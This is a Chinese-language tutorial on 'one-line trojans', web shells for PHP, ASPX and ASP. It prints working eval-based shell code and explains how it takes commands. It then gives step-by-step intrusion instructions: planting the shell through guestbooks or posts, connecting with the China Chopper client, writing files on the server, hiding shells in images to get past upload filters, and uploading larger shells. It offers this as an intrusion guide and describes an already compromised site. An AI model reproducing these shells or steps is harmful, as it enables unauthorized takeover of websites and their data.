一句話木馬原理與實戰
- 介紹
- 常用一句話木馬
-
- 分析一句話木馬
- 一句話使用方法
- 實戰
介紹
一句話木馬短小精悍,而且功能強大,隐蔽性非常好,在入侵中始終有強大的作用。
常用一句話木馬
php一句話木馬:
<?php @eval($_POST[value]);?>
aspx一句話木馬:
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
asp一句話木馬:
<%execute(request(“v”))%>
代碼本身沒有任何危害,但通過代碼上傳一些惡意的東西(如下載下傳,翻越,删除,建立)時可能會對網站造成一定危害。
分析一句話木馬
<%execute(request(“v”))%>
execute:是用來執行傳過來的資料。
request:通過用戶端定義了一個request接收的方式,服務端接收用戶端傳過來資料有get,post,request等方式。如果在腳本裡寫get的話,腳本傳送資料隻能用get方式,同理寫成post的話,隻能用post傳輸,但如果寫成request的話,get,post傳過來的資料,我都能接收。
V:如果網站隻支援ASP腳本,就要上傳ASP馬,上傳PHP可能不執行,其中“v”是自定義的變量,但是不能太簡單,簡單的話可能被工具爆破出來。
一句話使用方法
首先,找到資料庫是asp格式的網站,然後,以留言闆,或者發表文章的方式,把一句話添加到asp資料庫,或者加進asp網頁.
記住!我們的目的是把一句話<%execute request(“value”)%>添加到資料庫,無論任何方式!
然後打開用戶端(就是你電腦上面的那個htm檔案),填上加入了一句話的asp檔案,或者是asp網頁,然後進入此網站伺服器。
實戰
經過大量滲透已經在一個網站根目錄上傳了一句話木馬(V.asp),涉及隐私,具體步驟不做示範
一定要讓它執行!!! 如果不能執行,插在哪裡都沒用,接着打開中國菜刀,中國菜刀相當于一句話的用戶端,
有些人會問:為什麼要用它連
很多資料庫你得到使用者名和密碼,他如果沒有開允許外連去連的話,用web位址連接配接不到他,我們隻能向網站上傳木馬腳本,用本機的127.0.0.1去連接配接右擊增加shell,
寫入木馬位址,傳參的變量“V”,點選添加
輕按兩下目标網址就可以進入網址根目錄。。。成功
接着可以試着寫入一個文本,點選儲存
接着在浏覽器看能不能通路,可以看到成功寫入文本。
當然有時候我們要做圖檔馬
為什麼要做圖檔馬?
我們在上傳一句話的時候,直接上傳腳本上傳不上去,很多的話是上傳圖檔,頭像等可以上傳到伺服器,
一句話圖檔馬制作
C32下做一句話
打開C32,把圖檔放裡面,寫入一句話儲存,,退出,就制作成功一個圖檔馬
我順便上傳了一個小馬(x.asp),在浏覽器打開
輸入密碼之後,就可以上傳大馬,儲存名為2.asp,點選save
然後在浏覽器打開某某2.asp。。。成功